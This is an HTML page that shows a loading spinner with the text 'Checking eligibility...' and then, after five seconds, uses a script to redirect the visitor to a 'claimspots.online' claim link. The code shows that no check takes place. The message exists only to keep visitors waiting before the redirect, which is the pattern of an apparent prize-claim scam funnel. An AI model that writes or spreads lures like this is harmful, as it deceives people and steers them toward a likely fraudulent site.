
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Loading...</title>
  <style>
    body {
      background-color: #ffffff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      font-family: Arial, sans-serif;
      flex-direction: column;
    }
    .spinner {
      border: 16px solid #f3f3f3;
      border-top: 16px solid #00c851;
      border-radius: 50%;
      width: 160px;
      height: 160px;
      animation: spin 1.5s linear infinite;
      margin-bottom: 40px;
    }
    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
    h2 {
      color: #333;
      font-size: 28px;
      text-align: center;
    }
  </style>
  <script>
    setTimeout(function() {
      window.location.href = "https://claimspots.online/cl/i/x6eqj1";
    }, 5000);
  </script>
</head>
<body>
  <div class="spinner"></div>
  <h2>Checking eligibility...</h2>
</body>
</html>
